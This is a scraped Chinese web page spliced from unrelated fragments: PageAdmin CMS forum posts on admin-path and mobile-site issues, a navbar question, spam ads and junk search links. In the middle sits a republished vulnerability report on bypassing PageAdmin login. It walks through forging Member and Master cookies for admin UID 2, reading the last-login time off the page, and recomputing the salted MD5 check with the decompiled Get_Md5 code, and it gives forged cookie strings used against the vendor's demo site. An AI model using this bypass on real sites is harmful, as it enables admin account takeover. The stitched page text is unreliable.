PageAdmin 怎么去掉或修改如何让网站自适应手机机网站

来源:蜘蛛抓取(WebSpider) 时间:2017-08-20 22:51 标签: 手机网站 图片自适应
后使用快捷导航没有帐号?
只需一步,快速开始
查看: 4818|回复: 1
pageadmin免费建站软件不能访问后台的解决方法
UID282387在线时间 小时积分136帖子离线17487 天注册时间
初级会员, 积分 136, 距离下一级还需 64 积分
前段时间做好的企业网站,因为本身不太精通建站技术,所以只能找现成的cms模板来进行简单的修改,选了很久最后决定用pageadmin建站软件,算是一个不错的作品吧,免费、好用,灵活。下面就说我碰到的问题了
在本地将网站调试好后,上传到了空间里,因为后台路径太过明显,为了安全起见修改了后台文件夹和登陆文件(login.aspx),今天想进入后台添加第三方网站流量统计代码,输入修改后的后台路径****(避免说ad).com/gl/后却始终无法显示,提示路径错误的同时还自动跳转到了localhost/master/login.aspx,当时人就晕了,还以为是pageadmin免费软件是不是只能本地用呢,但是通过域名访问网站前台却是一切正常的,心想是不是后台路径不能修改?所以赶紧登陆ftp将后台路径还原,但是依然没有效果。无语,无奈........以为这下完了!
突然想到了web.config这个文件,在然后使用记事本一查看,发现了下面这句
&add key=&Url& value=&localhost& /&
问题也就出在这里了,赶紧将localhost修改为网站域名,然后再次访问后台,ok,问题终于得到解决!
哎,真的不容易啊!特地分享出来,希望可以接触pageadmin建站软件的朋友一个参考。
UID282387在线时间 小时积分136帖子离线17487 天注册时间
初级会员, 积分 136, 距离下一级还需 64 积分
Powered by用的是免费的pageadmin,现有自己的PC网站,想转换成手机版网页?
查看: 10247|回复: 5
用的是免费的pageadmin,现有自己的PC网站,想转换成手机版网页?
现有自己的PC网站,想通过手机扫描二维码来上手机版网页,现有的PC版网页由于图片、分辨率等问题,手机访问不太合适,想在现有的PC版网页基础之上来改成手机版网页。各位有什么办法没有?
安庆市人民路小学&&
怎么没有人回答呢?
见:现在主流手机基本都支持css5,你可以在默认模板上来自己修改。
斑竹的意思是直接新建一个或者多个栏目 设置成手机版本的 然后跳转 ?PageAdmin可绕过验证伪造任意用户身份登录(前台、后台)
PageAdmin可绕过验证伪造任意用户身份登录(前台、后台)
pageadmin.net
非授权访问/权限绕过
厂商已经确认
先大概说一下流程:
初步身份伪造--&获取某项信息--&程序计算--&伪造最终cookie登录成功
后台(特别注意!):
先成功伪造身份登录前台--&打开后台页面(注意让他重新获取cookie)--&程序计算--&利用伪造的cookie打开index
后台的必须按上面的流程走,没有登录前台的话会导致后台校验失败,有太多多余的cookie的话会导致后台登录后报错!
第一步,初步身份伪造
问题代码:
text = Member_Valicate.aC7c4DsFNKxcZ9Ao2KU(Member_Valicate.KfvFKOso9G8UQWWkflb(HttpContext.Current).Cookies[&Member&].Values, &UID&);
直接从Member里面获取UID的值。
http://demo.pageadmin.net/e/member/index.aspx?s=1&type=mem_idx
cookie添加
Member=UID=2&Valicate=f75efbab152cdf3
UID=2啥意思就不解释了,admin默认的uid是2
添加cookie之后访问上面的链接,即可:
测试另外一个网站:
本地测试:
但是在执行部分操作的时候是提示Valicate是无效的,如下图
再说下这个验证的代码:
b =Member_Valicate.KfvFKOso9G8UQWWkflb(HttpContext.Current).Cookies[&Member&].Values[&Valicate&].ToString();
this.U8VWxh9WtC = ((DateTime)oleDbDataReader[&lastdate&]).ToString(&yyyyMMddHHmmss&);
flag = !(md.Get_Md5(this.U8VWxh9WtC) != b); //把两个货比较,很悲剧啊
if (!flag)
this.tfYWhhmueR();
Member_Valicate.sVS2ySs4W4iMlcmVLhA(HttpContext.Current.Response, &&script type='text/javascript'&alert('invalid verification!');location.href='& + str + &';&/script&&);
arg_2A4_0 = 10;
b是你cookie中的valicate,U8VWxh9WtC是从数据库中读取出来的lastdate(最后登录时间),如下图
好吧,看到这里是不是觉得无解了?无法绕过?最后登录时间怎么搞啊?哈哈
第二步,获取“某项”信息
简单,仔细看登录后的页面:
014-5-22 10:17:18
明白没?虽然我们做不了别的操作,但是关键信息已经获取到了!
第三步,该上程序了!
关键的校验md5生成代码:
public string Get_Md5(string s)
MD5 mD = new MD5CryptoServiceProvider();
Encoding encoding = Encoding.GetEncoding(&UTF-8&);
string s2 = &pageadmin cms&;
byte[] array = mD.ComputeHash(encoding.GetBytes(s));
byte[] array2 = mD.ComputeHash(encoding.GetBytes(s2));
StringBuilder stringBuilder = new StringBuilder(32);
for (int i = 0; i & array.L i++)
stringBuilder.Append(((int)(array[i] + array2[i])).ToString(&x&).PadLeft(2, '0'));
return stringBuilder.ToString();
呵呵了吗?
用伪造好的东西(eee开头那串),上!
最终步骤!
呵呵了!做任何操作都没有限制!
漏洞证明:
在cookie中直接添加以下字段:
tongji=1; referer=; Master=UID=2&Valicate=dccd18ae511e2516a; SiteId=1
功访问后台!
试试官网:
但做其它操作会还是会提示:
原理和上面是一样的时间也是一样的具体不多说了,简单放几行代码
this.TclWJqMrlI = ((DateTime)oleDbDataReader[&lastdate&]).ToString(&yyyyMMddHHmmss&);
string text2 = HttpContext.Current.Request.Cookies[&Master&].Values[&Valicate&].ToString();
flag = !Master_Valicate.e51WJWsgAgH9BDJaION(md.Get_Md5(this.TclWJqMrlI), text2);
tongji=1; referer=; Master=UID=2&Valicate= eee0fe3b611afee314a; SiteId=1
另外一个网站:
官网demo:
后台拿shell请看之前发布的漏洞
修复方案:
这套程序太经典了,居然可以发现那么多有代表性的漏洞……身份验证应该严格一点啊,这也太松散了
版权声明:转载请注明来源 @
快来写下你的想法吧!
文章数:38565
(C) 安全脉搏请问如何调整导航栏宽度
查看: 2209|回复: 5
请问如何调整导航栏宽度
请问如何调整导航栏宽度,使其能够全屏?我调了网页样式,整个站都变了全屏了,但我只想调导航栏宽度。应当修改css哪段代码?
中频炉,中频电炉,中频感应淬火设备,超音频感应加热机,超音频淬火设备,中频熔炼炉请访问
回复 我是v2.1系统,修改这个不起作用啊!
中频炉,中频电炉,中频感应淬火设备,超音频感应加热机,超音频淬火设备,中频熔炼炉请访问
2.1做不了宽屏效果,框架限制
回复 2.1升级3.0多少钱。
中频炉,中频电炉,中频感应淬火设备,超音频感应加热机,超音频淬火设备,中频熔炼炉请访问
用这个工具自己升

我要回帖

更多关于 手机网站 图片自适应 的文章

 

随机推荐